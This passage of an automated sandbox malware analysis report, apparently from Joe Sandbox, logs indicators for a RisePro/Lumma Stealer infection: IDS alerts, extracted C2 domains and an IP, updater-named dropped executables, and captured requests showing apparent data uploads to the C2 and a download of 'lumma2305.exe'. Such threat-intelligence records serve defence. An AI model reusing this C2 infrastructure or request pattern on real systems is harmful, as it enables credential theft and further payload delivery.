Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49757 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: 7_2_004F4253 FindFirstFileExW,	7_2_004F4253
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: 9_2_00C04253 FindFirstFileExW,	9_2_00C04253
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: 17_2_00EA4253 FindFirstFileExW,	17_2_00EA4253
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: 20_2_00EA4253 FindFirstFileExW,	20_2_00EA4253

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.6:49710 -> 5.42.65.116:50500
Source: Traffic	Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 5.42.65.116:50500 -> 192.168.2.6:49710
Source: Traffic	Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 5.42.65.116:50500 -> 192.168.2.6:49710
Source: Traffic	Snort IDS: 2046269 ET TROJAN [ANY.RUN] RisePro TCP (Activity) 192.168.2.6:49710 -> 5.42.65.116:50500
Source: Traffic	Snort IDS: 2052761 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (employhabragaomlsp .shop) 192.168.2.6:65237 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49715 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49716 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49717 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49718 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49719 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49720 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49721 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49722 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49723 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49724 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49726 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49729 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49732 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49734 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49736 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49737 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49738 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49739 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49740 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49741 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49742 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49743 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49744 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49745 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49746 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49747 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49748 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49750 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49751 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49752 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49753 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49754 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49755 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49756 -> 188.114.96.3:443
Source: Traffic	Snort IDS: 2052775 ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI) 192.168.2.6:49757 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: roomabolishsnifftwk.shop
Source: Malware configuration extractor	URLs: civilianurinedtsraov.shop
Source: Malware configuration extractor	URLs: stalfbaclcalorieeis.shop
Source: Malware configuration extractor	URLs: employhabragaomlsp.shop
Source: Malware configuration extractor	URLs: femininiespywageg.shop
Source: Malware configuration extractor	URLs: averageaattractiionsl.shop
Source: Malware configuration extractor	URLs: buttockdecarderwiso.shop
Source: Malware configuration extractor	URLs: museumtespaceorsp.shop
Source: Malware configuration extractor	URLs: employhabragaomlsp.shop

Source: global traffic

TCP traffic: 192.168.2.6:49710 -> 5.42.65.116:50500

Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: ipinfo.io
Source: unknown	DNS query: name: ipinfo.io

Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.175 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=8.46.123.175 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12854Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12854Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12854Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15100Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19958Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15100Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19958Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5429Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1237Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5429Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1237Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 566526Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12854Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 566526Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15100Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19958Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5429Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1234Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12854Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15100Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572276Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19958Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5429Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1234Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572276Host: employhabragaomlsp.shop
Source: global traffic	HTTP traffic detected: HEAD /lumma2305.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 5.42.65.116Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /lumma2305.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 5.42.65.116Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116
Source: unknown	TCP traffic detected without corresponding DNS query: 5.42.65.116

Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.175 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=8.46.123.175 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /lumma2305.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 5.42.65.116Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: db-ip.com
Source: global traffic	DNS traffic detected: DNS query: employhabragaomlsp.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: employhabragaomlsp.shop

